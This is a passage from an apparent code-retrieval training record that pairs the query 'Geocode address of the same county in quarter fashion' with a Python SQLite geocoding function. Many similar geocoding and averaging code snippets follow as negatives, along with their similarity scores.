e:\n\t\tprint e\n\t\treturn None", "def average_consensus(self, cluster):\n\t\tcenterk = 0\n\t\tindex = 0\n\t\tfor value in cluster:\n\t\t\tcenterk += value\n\t\t\tindex += 1\n\t\tcenterk = centerk / index\n\t\treturn centerk", "def get_average_torsion (phis) :\n shift = phis[0]\n phis_shifted = get_diffvec(phis,shift)\n avg_shifted = phis_shifted.sum()/len(phis)\n average = avg_shifted + shift\n return average", "def get_average_torsion (phis) :\n shift = phis[0]\n phis_shifted = get_diffvec(phis,shift)\n avg_shifted = phis_shifted.sum()/len(phis)\n average = avg_shifted + shift\n return average", "def geo_mean(array):\n logsum = sum([np.log(each) for each in array])/len(array)\n return np.exp(logsum)", "def time_segments_average(X, interval, time_column):\n warnings.warn(_TIME_SEGMENTS_AVERAGE_DEPRECATION_WARNING, DeprecationWarning)\n\n if isinstance(X, np.ndarray):\n X = pd.DataFrame(X)\n\n X = X.sort_values(time_column).set_index(time_column)\n\n start_ts = X.index.values[0]\n max_ts = X.index.values[-1]\n\n values = list()\n index = list()\n while start_ts <= max_ts:\n end_ts = start_ts + interval\n subset = X.loc[start_ts:end_ts - 1]\n means = subset.mean(skipna=True).values\n values.append(means)\n index.append(start_ts)\n start_ts = end_ts\n\n return np.asarray(values), np.asarray(index)", "def get_mean(self):\n return numpy.mean(self._x) - numpy.mean(self._y)" ]
[ "0.66684115", "0.66580987", "0.6334983", "0.62975043", "0.61769515", "0.61367", "0.60557425", "0.6047087", "0.6028656", "0.59404755", "0.57874817", "0.57128465", "0.57006764", "0.5697978", "0.5691043", "0.5690729", "0.5679087", "0.56297153", "0.5596291", "0.55928093", "0.5568367", "0.5548994", "0.5548278", "0.55322206", "0.5515946", "0.5509877", "0.55028063", "0.5491786", "0.54814065", "0.5480621", "0.5452065", "0.54501164", "0.5443249", "0.5430048", "0.540636", "0.540484", "0.5398415", "0.5395445", "0.5355947", "0.53523433", "0.5343013", "0.5330681", "0.5324898", "0.53242874", "0.5322479", "0.5320272", "0.53152364", "0.53024685", "0.52942204", "0.52838963", "0.52838", "0.5279754", "0.52759075", "0.5267347", "0.52653176", "0.5243531", "0.5243246", "0.5232867", "0.5225581", "0.52146196", "0.52128386", "0.52028716", "0.5196866", "0.5193779", "0.5193741", "0.517402", "0.5164202", "0.51507604", "0.5146277", "0.5143922", "0.5138266", "0.5137906", "0.5137757", "0.5137757", "0.5137757", "0.5136685", "0.51355344", "0.5133684", "0.5131036", "0.5130334", "0.51271796", "0.51271427", "0.5115792", "0.51149267", "0.51027805", "0.5102055", "0.50986856", "0.5087018", "0.5085815", "0.50745124", "0.5067114", "0.5063206", "0.5056848", "0.5041147", "0.5040832", "0.5033389", "0.5033389", "0.5031916", "0.502664", "0.50209445" ]
0.5241144
57
Geocode address of the same county in quarter fashion
def partition_geocode(con: sqlite3.Connection, cur: sqlite3.Cursor, quarter: str, county_cht: str):
    cur.execute('''SELECT 土地區段位置或建物區門牌 FROM "{0}/TRX"
                   WHERE 縣市 = ? GROUP BY 土地區段位置或建物區門牌;'''.format(quarter), (county_cht,))
    for address, in cur.fetchall():
        cur.execute('''SELECT GEO.編號 FROM "{0}/TRX" AS TRX, "{0}/GEO" AS GEO
                       WHERE TRX.編號 = GEO.編號 AND TRX.土地區段位置或建物區門牌 = ?
                       AND GEO.LAT_Avg ISNULL;'''.format(quarter), (address,))
        identities = cur.fetchall()
        if not identities:
            continue
        print("[%d] " % (len(identities)) + address)
        try:
            results = selective_geocode(address)
        except geo.AddressError:
            continue
        if len(results["lat"]) != 5 or len(results["lon"]) != 5:
            continue
        results["lat"].append(sum(results["lat"]) / len(results["lat"]))
        results["lon"].append(sum(results["lon"]) / len(results["lon"]))
        combined = [num for zipped in zip(results["lat"], results["lon"]) for num in zipped]
        values = [(tuple(combined) + identity) for identity in identities]
        cur.executemany('''UPDATE "{0}/GEO"
                           SET LAT_1 = ?, LON_1 = ?, LAT_2 = ?, LON_2 = ?, LAT_3 = ?, LON_3 = ?,
                               LAT_4 = ?, LON_4 = ?, LAT_5 = ?, LON_5 = ?, LAT_Avg = ?, LON_Avg = ?
                           WHERE 編號 = ?;'''.format(quarter), values)
        con.commit()
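A small sketch of how the UPDATE parameters above are assembled: five sampled coordinates plus their appended average are interleaved into the (LAT_1, LON_1, ..., LAT_5, LON_5, LAT_Avg, LON_Avg) order expected by the placeholders, then each row's 編號 is appended. The coordinate values and identities below are invented for illustration only.

# Invented sample values: five sampled coordinates plus their appended average.
lat = [25.01, 25.02, 25.03, 25.04, 25.05]
lon = [121.51, 121.52, 121.53, 121.54, 121.55]
lat.append(sum(lat) / len(lat))
lon.append(sum(lon) / len(lon))

# Interleave into (LAT_1, LON_1, ..., LAT_5, LON_5, LAT_Avg, LON_Avg),
# matching the placeholder order of the UPDATE statement above.
combined = [num for pair in zip(lat, lon) for num in pair]
identities = [("R-0001",), ("R-0002",)]  # hypothetical 編號 rows returned by fetchall()
values = [tuple(combined) + identity for identity in identities]
print(values[0])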
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def geo_coder(house_number, boro_code, street_name, zip_code): \r\n wa1 = '1B{}{}{}{}{}C{}{}'.format(rightpad(house_number, 16), rightpad('', 38), boro_code, rightpad('', 10), rightpad(street_name, 32), rightpad('', 113), rightpad(zip_code, 5))\r\n wa1 = rightpad(wa1, 1200)\r\n wa2 = rightpad('', 4300)\r\n NYCGeo.NYCgeo(wa1, wa2)\r\n return wa1, wa2", "def geocode(self, geocoder):\n for term in self.terms:\n # No need to geocode regions\n if not term.get('region'):\n geo = geocoder.geocode(term['string'])\n if geo:\n term['geo'] = geo\n if not self.region:\n # TODO: descobrir regiao do ponto\n self.region = \"???\"\n else:\n self.region = term['region']", "def geocode(address):\n geo_data = requests.get(\"https://geocode.xyz/{}?json=1\".format(\n urllib.parse.quote_plus(address)))\n geo_json = json.loads(geo_data.content)\n\n return geo_json['standard']['city'], geo_json['latt'], geo_json['longt']", "def geocode(df, col):\r\n pass", "def get_city_by_code(post_code):\n post_code = post_code.replace(' ', '').encode('utf-8')\n error = ''\n city = ''\n opener = urllib2.build_opener()\n url = 'http://maps.googleapis.com/maps/api/geocode/json?address={0}&sensor=false'.format(post_code)\n response = opener.open(url).read()\n response_dict = json.loads(response)\n request_status = response_dict['status']\n if request_status == 'OK':\n logger.debug('Google response')\n logger.debug(response_dict)\n results = response_dict['results']\n \"\"\"\n first get all results\n with required zip code\n \"\"\"\n results_with_required_zip_code = []\n for result in results:\n address_components = result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'postal_code' and address_component['short_name'].replace(' ', '').lower() == post_code.lower():\n results_with_required_zip_code.append(result)\n if not results_with_required_zip_code:\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n # error = 'No location with post code %s' % post_code\n else:\n \"\"\"\n next we need all results in GB\n \"\"\"\n results_with_required_zip_code_in_GB = ''\n for good_result in results_with_required_zip_code:\n address_components = good_result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'country' and address_component['short_name'].lower() == 'GB'.lower():\n results_with_required_zip_code_in_GB = good_result\n if not results_with_required_zip_code_in_GB:\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in GB' % post_code\n else:\n \"\"\"\n finally find city name\n \"\"\"\n address_components = results_with_required_zip_code_in_GB['address_components']\n # first try get postal city\n searching_city = get_city_by_key(address_components, 'postal_town')\n if not searching_city:\n # next by administrative_area_level_2\n searching_city = get_city_by_key(address_components, 'administrative_area_level_2')\n if not searching_city:\n print url\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in GB' % post_code\n else:\n city = searching_city\n elif request_status == 'ZERO_RESULTS':\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': 
POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n else:\n error = request_status\n return {\n 'error': error,\n 'data': city\n }", "def geocode(addr_str):\n\n\tbase_url = 'http://gis.oregonmetro.gov/rlisapi2/locate/'\n\turl_template = '{0}?token={1}&input={2}&form=json'\n\turl = url_template.format(base_url, token, addr_str)\n\tresponse = requests.get(url)\n\n\tif response.status_code != 200:\n\t\tprint 'unable to establish connection with rlis api'\n\t\tprint 'status code is: {0}'.format(response.status_code)\n\t\treturn response.status_code\n\t\n\tjson_rsp = response.json()\n\tif json_rsp['error']:\n\t\tprint 'the following address could not be geocoded:'\n\t\tprint '\\'{0}\\''.format(addr_str)\n\t\tprint 'the following error message was returned:'\n\t\tprint '\\'{0}\\''.format(json_rsp['error']), '\\n'\n\telse:\n\t\treturn json_rsp['data'][0]", "def geocode(postcode):\n key = current_app.config.get(\"OS_PLACES_API_KEY\")\n formatted_addresses = FormattedAddressLookup(key=key).by_postcode(postcode)\n response = [{\"formatted_address\": address} for address in formatted_addresses if address]\n return Response(json.dumps(response), mimetype=\"application/json\")", "def geocode(self, query, exactly_one=True, timeout=None):\n params = {\n 'addr': self.format_string % query,\n }\n if self.api_key:\n params['key'] = self.api_key\n url = \"?\".join((self.api, urlencode(params)))\n logger.debug(\"%s.geocode: %s\", self.__class__.__name__, url)\n return self._parse_json(\n self._call_geocoder(url, timeout=timeout), exactly_one\n )", "def roadToCoor(rn):\n # sleep(2)\n g = gmaps.geocode(rn)\n\n zipCode = None\n coor_Lat, coor_Lng, bbox_NE_Lat, bbox_NE_Lng, bbox_SW_Lat, bbox_SW_Lng = None, None, None, None, None, None\n if len(g) > 0:\n if len(g) > 0:\n for ac in g[0]['address_components']:\n try:\n if ac['types'][0] == 'postal_code':\n zipCode = ac['long_name']\n except:\n zipCode = None\n\n if 'location' in g[0]['geometry'].keys():\n try:\n coor = g[0]['geometry']['location'] # APPROXIMATE location\n coor_Lat = coor['lat']\n coor_Lng = coor['lng']\n except:\n coor_Lat, coor_Lng = None, None\n\n if 'bounds' in g[0]['geometry'].keys(): # bounding box\n try:\n bbox = g[0]['geometry']['bounds']\n bbox_NE_Lat = bbox['northeast']['lat']\n bbox_NE_Lng = bbox['northeast']['lng']\n bbox_SW_Lat = bbox['southwest']['lat']\n bbox_SW_Lng = bbox['southwest']['lng']\n except:\n bbox_NE_Lat, bbox_NE_Lng, bbox_SW_Lat, bbox_SW_Lng = None, None, None, None\n\n # g = geocoder.google(loc)\n # print(loc, g.latlng)\n coors = (coor_Lat, coor_Lng, bbox_NE_Lat, bbox_NE_Lng, bbox_SW_Lat, bbox_SW_Lng)\n return zipCode, coors", "def find_places(query):\n parts = str(query).split(' ')\n for i, p in enumerate(parts):\n p = p.replace('-', ' ').strip()\n try:\n postal_code = int(p)\n if len(postal_code) == 4:\n print(postal_code, parts[i+1])\n # Check \n #response = get_osm_location(\"{postal_code} {name}\")\n #lon = response['lon']\n #lat = response['lat']\n #poly = \n except Exception as e:\n continue", "def postcode(full_address):\n return capture_address_element(POSTCODE_PATTERN, full_address)", "def _geocode(self, phn, street, borough_code=None, zip=None):\n try:\n r = self._g[self.geofunction](house_number=phn, street=street, borough_code=borough_code, zip=zip)\n self.results.append(r)\n except GeosupportError as ge:\n if 'SIMILAR NAMES' in ge.result[\"Message\"]:\n list_of_street_names = ge.result['List of Street Names']\n r = [{\n 'street': s,\n 'borough_code': borough_code\n } for s in list_of_street_names]\n 
self.similiar_names.extend(r)", "def geocode(address, jurisdictions, required_precision_km=1., limit=5):\n try:\n key = 'pk.eyJ1IjoiZGV2c2VlZCIsImEiOiJnUi1mbkVvIn0.018aLhX0Mb0tdtaT2QNe2Q'\n geocoded = NewMapboxQuery(address, key=key, country='us', limit=limit)\n results = []\n if len(geocoded) > 0:\n for item in geocoded:\n multipoints = MultiPoint([GEOSGeometry(item.wkt)])\n for jurisdiction in jurisdictions.filter(geometry__intersects=multipoints):\n if not jurisdiction in results:\n results.append(jurisdiction)\n return results\n return []\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n return []", "def geocode_one(self, postcode: str, address: Optional[str] = None) -> pd.Series:\n if postcode is None and address is None:\n raise utils.GenericException(\"You must pass either postcode or address, or both.\")\n if self.gmaps_key is None:\n self.gmaps_key = self._load_key()\n if self.gmaps_key is not None:\n self.gmaps_client = googlemaps.Client(key=self.gmaps_key)\n if self.cache is None:\n self._load_cache()\n sep = \", \" if address and postcode else \"\"\n postcode = postcode if postcode is not None else \"\"\n address = address if address is not None else \"\"\n search_term = f\"{address}{sep}{postcode}\"\n if search_term in self.cache:\n logging.debug(\"Loading GMaps Geocoder API result from cache: '%s'\", search_term)\n geocode_result = self.cache[search_term]\n else:\n logging.debug(\"Querying Google Maps Geocoder API for '%s'\", search_term)\n if self.gmaps_key is None:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geocode_result = self.gmaps_client.geocode(search_term, region=\"uk\")\n self.cache[search_term] = geocode_result\n self.cache_modified = True\n if not geocode_result or len(geocode_result) > 1:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geometry = geocode_result[0][\"geometry\"]\n ok_loc_types = [\"ROOFTOP\", \"GEOMETRIC_CENTER\"]\n if geometry[\"location_type\"] in ok_loc_types or \\\n geocode_result[0][\"types\"] == [\"postal_code\"]:\n return pd.Series({\"latitude\": geometry[\"location\"][\"lat\"],\n \"longitude\": geometry[\"location\"][\"lng\"],\n \"match_status\": 3})\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})", "def geolocate_address(self):\n self.geolocator = Nominatim(user_agent=\"fundaft\")\n\n # If latitude / longitude are missing, try to geocode them on the basis\n # of the address \n self.coords = [self.get_coords(address) if np.isnan(lat)\n else (lat, lon) for address, lat, lon in\n zip(self.df_ads['property_title'], \n self.df_ads['latitude'], \n self.df_ads['longitude'])]\n \n df = pd.DataFrame(self.coords, columns=['latitude', 'longitude'])\n \n # If new coordinates are not in Dublin, change to na again\n df = self.is_in_dublin(df)\n\n self.df_ads[[\"latitude\",\"longitude\"]] = df", "def get_city(address):\n geolocator = Nominatim(user_agent=\"specify_your_app_name_here\")\n \n while True:\n try:\n location = geolocator.geocode(address)\n break\n except Exception:\n None\n \n city = citipy.nearest_city(location.latitude, location.longitude)\n return [city.city_name.title(), city.country_code.title()]", "def rlis_geocode(addr_str, token):\n\n url = 'http://gis.oregonmetro.gov/rlisapi2/locate/'\n params = {\n 'token': token,\n 'input': addr_str,\n 'form': 'json'\n }\n rsp = requests.get(url, params=params)\n\n if rsp.status_code != 200:\n return -1, -1, -1\n else:\n json_rsp = rsp.json()\n if 
json_rsp['error']:\n return -1, -1, -1\n else:\n return json_rsp['data'][0]['lat'], json_rsp['data'][0]['lng'], json_rsp['data'][0]['fullAddress']", "def selective_geocode(rough_address: str) -> dict:\n lat_results = []; lon_results = []\n found = re.findall(r\"\\d+~\\d+\", rough_address)\n if not found:\n raise geo.AddressError(geo.__name__, rough_address)\n bound = [int(i) for i in found[0].split('~')]\n if bound[0] > bound[1]:\n raise geo.AddressError(geo.__name__, rough_address)\n interval = int((bound[1] - bound[0] + 1) / settings.GEO_SAMPLES)\n samples = [i for i in range(bound[0], bound[1] + 1, interval)]\n for sample in samples:\n query_address = rough_address.replace(found[0], str(sample))\n gps_coordinates = geo.geocode(query_address, culture='zh-TW')[\"GPS\"]\n if gps_coordinates[\"lat\"] and gps_coordinates[\"lon\"]:\n lat_results.append(gps_coordinates[\"lat\"])\n lon_results.append(gps_coordinates[\"lon\"])\n return {\"lat\": lat_results, \"lon\": lon_results}", "def _format_address(address):\n if 'country' in address and address['country']:\n country = address['country']\n if country == 'CA':\n address['country'] = 'CANADA'\n elif country == 'US':\n address['country'] = 'UNITED STATES OF AMERICA'\n else:\n try:\n country: str = pycountry.countries.search_fuzzy(country)[0].name\n address['country'] = country.upper()\n except (AttributeError, TypeError):\n address['country'] = country\n\n return address", "def geocode(address):\n\n mapsurl = ('http://maps.googleapis.com/maps/api/geocode/xml?address=' +\n address.replace(' ', '+') + '&sensor=false')\n\n coords = urllib.urlopen(mapsurl).read()\n root = etree.fromstring(coords)\n coordstr = (0, 0)\n loc = root.find(\".//location\")\n if not loc is None:\n coordstr = (loc[1].text, loc[0].text)\n return coordstr", "def geocode(self, resource):\n # Turn the different address components into a formatted string\n search_address = \", \".join(a for a in [resource.street,\n resource.city, resource.state,\n resource.zipcode, resource.country]\n if a is not None and not\n a.isspace())\n\n # Make sure we generated something meaningful\n if search_address and search_address is not None:\n # Now query the geocoder with this formatted string\n geolocator = GoogleV3(api_key=self.api_key)\n address, (latitude, longitude) = geolocator.geocode(search_address)\n\n # Update the resource based on the returned geopy.location.Location\n if address and not address.isspace():\n resource.fulladdress = address\n\n if latitude and longitude:\n resource.latitude = latitude\n resource.longitude = longitude\n\n # FUTURE: Perform additional normalization operations based\n # on the information in Location.raw\n pass", "def makeAddressToGeocodeRequest(address):\n global headersGlobal, URL_addressToGeocode # get global variables\n\n key = variables.bingMapsAPIKey # api key\n\n # construct the url\n url = URL_addressToGeocode + str(address[0]) + \"/\" + str(address[1]) + \"/\" + str(address[2]) + \"/\" + str(\n address[3]) + \"/\" + str(address[4]) + \"?key=\" + key\n\n request = requests.get(url, headers=headersGlobal) # make the request\n return request # return the request", "def geocoding(address):\n AUTH = json.loads(open(\"auth.json\", \"r\").read())\n\n r = requests.get(f\"https://maps.googleapis.com/maps/api/geocode/json\", params={\n \"address\": address,\n \"key\": AUTH[\"GMAP_API\"]\n })\n\n if r.status_code == 200:\n r = r.json()\n results = r[\"results\"]\n if len(results) < 1:\n log.error(\"No result geocoding for %s\", address)\n return (-1, 
-1)\n\n result = results[0]\n proper_address = result[\"formatted_address\"]\n loc = result[\"geometry\"][\"location\"]\n lat = loc[\"lat\"]\n lng = loc[\"lng\"]\n\n return (proper_address, lat, lng)\n\n else:\n log.error(\"Error in Geocoding %s\", address)\n return (-1, -1)", "def county_name(zipcode): \n search = SearchEngine(simple_zipcode=True) # set simple_zipcode=False to use rich info database\n zipcode_query = search.by_zipcode(str(zipcode))\n zipcode_query_dict = zipcode_query.to_dict()\n county = zipcode_query_dict['county']\n if county is None:\n print('Invalid County')\n else :\n if 'County' in county:\n county = county[:-7]\n if county in county_list:\n print('County is County List')\n print(county)\n return county", "def geocoding(address, API_KEY=API_KEY, GEOCODE_API_URL=GEOCODE_API_URL):\n # define the parameters of the search\n params = {\n 'address': '{}'.format(address),\n 'key': API_KEY\n }\n\n # Do the request and get the response data\n response = requests.get(GEOCODE_API_URL, params=params)\n response = response.json()\n\n geodata = parse_response(response)\n return geodata", "def test_city_country_population(self):\n\t\tformatted_address = city_country(\n\t\t\t'santiago', 'chile', '5000000')\n\t\tself.assertEqual(formatted_address, \n\t\t\t'Santiago, Chile - Population 5000000')", "def get_location_gecode_address_str(address):\n location = {\n 'Latitude': {\n 'Value': None\n },\n 'Longitude': {\n 'Value': None\n }\n }\n geo_res = []\n if bool(address): # Check if address is non-falsey \n geo_res = gmaps.geocode(address)\n if len(geo_res) != 0:\n latitude = geo_res[0]['geometry']['location']['lat']\n longitude = geo_res[0]['geometry']['location']['lng']\n location['Latitude']['Value'] = latitude\n location['Longitude']['Value'] = longitude\n return location", "def geocode_postcode(self, postcode: [str],\n address: Optional[str] = None) -> Union[Tuple[float, float], List[Tuple[float, float]]]:\n address = [None for a in address] if address is None else list(address)\n logging.debug(\"Geocoding %s postcodes (%s addresses)\", len(postcode), len(address))\n results = []\n for pc, addr in zip(postcode, address):\n results.append(self.geocode_one(postcode=pc, address=addr))\n return results", "def geocode(self, term):\n # TODO: permitir cofigurar isso...\n # limit string size\n s = term[:60]\n # check cache\n term_geo = self.cache.get(s)\n if not term_geo:\n term_geo = {}\n # query all servers\n for server_name, func in self.server_options.items():\n points = func(s)\n term_geo[server_name] = []\n for point in points:\n region = self.inside_limits(point)\n if region:\n if region is True:\n region = \"???\"\n print(region)\n term_geo[server_name].append({\n \"address\": point.address,\n \"latitude\": point.latitude,\n \"longitude\": point.longitude,\n \"region\": region\n })\n self.cache[s] = term_geo\n # print(\"------------------------------------\")\n # print(term_geo)\n return term_geo", "def address_to_census(address, aggregation=\"blocks\", max_requests = 100):\n if pd.isna(address):\n return address\n\n OPTIONS = {\"census block groups\", \"census block group\", \"block groups\", \"block group\", \"census blocks\",\n \"census block\", \"blocks\", \"block\", \"census tracts\", \"census tract\", \"tracts\", \"tract\"}\n\n assert aggregation in OPTIONS, \"The selected aggregation is not a valid option. 
Please select from the 3 possible choices: block groups, blocks, tracts\"\n\n result = cg.onelineaddress(address, returntype=\"geographies\")\n\n if result:\n geographies = result[0][\"geographies\"]\n census_blocks = geographies[\"2020 Census Blocks\"][0]\n else:\n geolocator = ArcGIS()\n g = geolocator.geocode(address)\n x = g.longitude\n y = g.latitude\n result = None\n # This while loop is meant to deal with errors thrown on portions of the responses from https://geocoding.geo.census.gov/geocoder/\n # https://github.com/fitnr/censusgeocode/issues/18\n req_counter = 0\n while result is None and req_counter < max_requests:\n try:\n result = cg.coordinates(x=x, y=y, returntype=\"geographies\")\n except:\n pass\n req_counter += 1\n census_blocks = result[\"2020 Census Blocks\"][0]\n\n\n STATE = census_blocks[\"STATE\"]\n COUNTY = census_blocks[\"COUNTY\"]\n TRACT = census_blocks[\"TRACT\"]\n BLOCK_GROUP = census_blocks[\"BLKGRP\"]\n BLOCK = census_blocks[\"BLOCK\"]\n\n if str.lower(aggregation) in {\"census block groups\", \"census block group\", \"block groups\", \"block group\"}:\n return STATE + COUNTY + TRACT + BLOCK_GROUP\n elif str.lower(aggregation) in {\"census blocks\", \"census block\", \"blocks\", \"block\"}:\n return STATE + COUNTY + TRACT + BLOCK\n elif str.lower(aggregation) in {\"census tracts\", \"census tract\", \"tracts\", \"tract\"}:\n return STATE + COUNTY + TRACT", "def concat_address_full(**kwargs):\r\n result = \"{concat_address} {city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n if kwargs[\"four_digit_zip_code\"]:\r\n result += \"-{four_digit_zip_code}\".format(**kwargs)\r\n return result", "def resolve_query_place(query):\n\n\tallTokens = [token for token in query.replace(',', ' ').split(' ') if token]\n\tif not len(allTokens):\n\t\treturn ('', None)\n\tcomponents = [component.split(' ') for component in query.split(',') if component]\n\tcities = None\n\tregions = None\n\tcountries = None\n\tplaces = None\n\tconsumed = 0\n\t\n\tdef get_component():\n\t\t\"\"\" Returns a sub sequence of a component. This makes use of the commas as hard delimiters to separate city, state, etc. \"\"\"\n\t\tcomponentConsumed = consumed\n\t\tfor i in range(len(components)):\n\t\t\tif componentConsumed < len(components[-i]):\n\t\t\t\treturn components[-i][:-componentConsumed if componentConsumed else None]\n\t\t\telse:\n\t\t\t\tcomponentConsumed -= len(components[-i])\n\t\treturn []\n\n\tif len(allTokens[-1]) == 2 and allTokens[-1].isalpha():\n\t\tif len(allTokens) >= 2 and len(allTokens[-2]) == 2 and allTokens[-2].isalpha():\n\t\t\t# A county and region code were given. e.g. 
CA US -> US.CA\n\t\t\tregions = Region.objects.filter(code='%s.%s' % (allTokens[-1].upper(), allTokens[-2].upper()))\n\t\t\tconsumed = 2\n\t\telse:\n\t\t\t# A single region or country code was given\n\t\t\tregions = Region.objects.filter(code__endswith=allTokens[-1].upper())\n\t\t\tif not len(regions):\n\t\t\t\tcountries = Country.objects.filter(code=allTokens[-1].upper()).order_by('-population')\n\t\t\tconsumed = 1\n\t\tif len(regions):\n\t\t\t# Found a region, also try to find the city that goes with the region\n\t\t\tplaces = regions\n\t\t\tcityConsumed = __parse_city(get_component())\n\t\t\tif cityConsumed:\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), region__in=regions).order_by('-population')\n\t\t\t\tif len(cities):\n\t\t\t\t\tplaces = cities\n\t\t\t\t\tconsumed += cityConsumed\n\t\telif len(countries):\n\t\t\t# Found a country, also try to find the city that goes with the country\n\t\t\tplaces = countries\n\t\t\tcityConsumed = __parse_city(get_component())\n\t\t\tif cityConsumed:\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), country=countries[0]).order_by('-population')\n\t\t\t\tif len(cities):\n\t\t\t\t\tplaces = cities\n\t\t\t\t\tconsumed += cityConsumed\n\telse:\n\t\t# No codes were given, the query is more free form\n\t\t# Match the country first\n\t\tcountryConsumed = __parse_country(get_component())\n\t\tif countryConsumed:\n\t\t\tcountries = Country.objects.filter(name__iexact=' '.join(allTokens[-(consumed + countryConsumed):-consumed if consumed else None])).order_by('-population')\n\t\t\tif len(countries):\n\t\t\t\tplaces = countries\n\t\t\t\tconsumed += countryConsumed\n\t\t# Try region then city matching\n\t\tregionConsumed = __parse_region(get_component())\n\t\tif regionConsumed:\n\t\t\tif countries and len(countries):\n\t\t\t\tregions = Region.objects.filter(name__iexact=' '.join(allTokens[-(consumed + regionConsumed):-consumed if consumed else None]), country=countries[0])\n\t\t\telse:\n\t\t\t\tregions = Region.objects.filter(name__iexact=' '.join(allTokens[-(consumed + countryConsumed):-consumed if consumed else None]))\n\t\t\tif len(regions):\n\t\t\t\tplaces = regions\n\t\t\t\tconsumed += regionConsumed\n\t\tcityConsumed = __parse_city(get_component())\n\t\tif cityConsumed:\n\t\t\tif regions and len(regions):\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), region__in=regions).order_by('-population')\n\t\t\telif len(countries):\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), country=countries[0]).order_by('-population')\n\t\t\telse:\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None])).order_by('-population')\n\t\t\tif len(cities):\n\t\t\t\tplaces = cities\n\t\t\t\tconsumed += cityConsumed\n\t\t# If region was found without a city go back to just try to resolve it to a city instead\n\t\tif (regions and len(regions)) and (not cities or not len(cities)):\n\t\t\tconsumed -= regionConsumed\n\t\t\tcityConsumed = __parse_city(get_component())\n\t\t\tif cityConsumed:\n\t\t\t\tif len(countries):\n\t\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), 
country=countries[0]).order_by('-population')\n\t\t\t\telse:\n\t\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None])).order_by('-population')\n\t\t\t\tif len(cities):\n\t\t\t\t\tplaces = cities\n\t\t\t\t\tconsumed += cityConsumed\n\t\t\tif not cities or not len(cities):\n\t\t\t\t# No city found, region is the best match\n\t\t\t\tconsumed -= regionConsumed\n\n\treturn (' '.join(allTokens[:-consumed if consumed else None]), places)", "def address():\n # We start with generating the street name. For this we choose\n # between the most common prefixes and our own prefixes\n prefix = dice.randint(1, 100)\n if prefix <= 10: # 10%\n prefix = \"Haupt\"\n elif prefix <= 18: # 8%\n prefix = \"Schul\"\n elif prefix <= 25: # 7%\n prefix = \"Garten\"\n elif prefix <= 32: # 7%\n prefix = \"Dorf\"\n elif prefix <= 39: # 7%\n prefix = \"Bahnhof\"\n elif prefix <= 46: # 7%\n prefix = \"Wiesen\"\n elif prefix <= 52: # 6%\n prefix = \"Berg\"\n elif prefix <= 56: # 4%\n prefix = \"Kirch\"\n elif prefix <= 60: # 4%\n prefix = \"Wald\"\n elif prefix <= 64: # 4%\n prefix = \"Ring\"\n else:\n prefix = dice.choice(names.prefix)\n\n # Now we can add the suffix\n suffix = dice.randint(1, 100)\n if suffix <= 78:\n suffix = \"straße\"\n elif suffix <= 96:\n suffix = \"weg\"\n elif suffix <= 98:\n suffix = \"allee\"\n elif suffix == 99:\n suffix = \"ring\"\n elif suffix == 100:\n suffix = \"platz\"\n\n # When we have a city name as prefix, we need to capitalize the\n # suffix since it will be two words\n if prefix[-1] == \" \":\n suffix = suffix.capitalize()\n\n # Now we can add them together\n street = prefix + suffix\n\n # We need a house number as well. In Germany most numbers have\n # between one and four digits, so we will use this as base. Lower\n # numbers are more common, so we'll give it a 10% probability of\n # using 3 digits and 1% of using 4 digits\n digits = dice.randint(1, 100)\n if digits == 100:\n house_number = str(dice.randint(1000, 9999))\n elif digits >= 90:\n house_number = str(dice.randint(100, 999))\n else:\n house_number = str(dice.randint(1, 99))\n address_full = street + \" \" + house_number\n return address_full", "def search_address(query: str) -> Tuple[int, str]:\n\n url = 'https://api.n1.ru/api/v1/geo/geocoder/with_cities/'\n params = _search_params.copy()\n params['q'] = query\n\n try:\n r = requests.get(url, params=params, headers=_headers)\n response = r.json()\n\n if not 'result' in response or not response['result']:\n raise NotFoundException('Result not found or empty.')\n \n address = None\n house_number = query.split(',')[-1].strip()\n for x in response['result']:\n if x['name_ru'].lower() == house_number:\n address = x\n break\n \n if address is None:\n raise NotFoundException(f'Not found house number {house_number} in result: {response[\"result\"]}')\n \n return address['street']['id'], address['name_ru']\n except requests.RequestException as e:\n raise ParserException(f'Fail make request. query: {query}') from e\n except NotFoundException as e:\n raise ParserException('Invalid result.') from e\n except (KeyError, IndexError) as e:\n raise ParserException(f'Fail get street id or house number. 
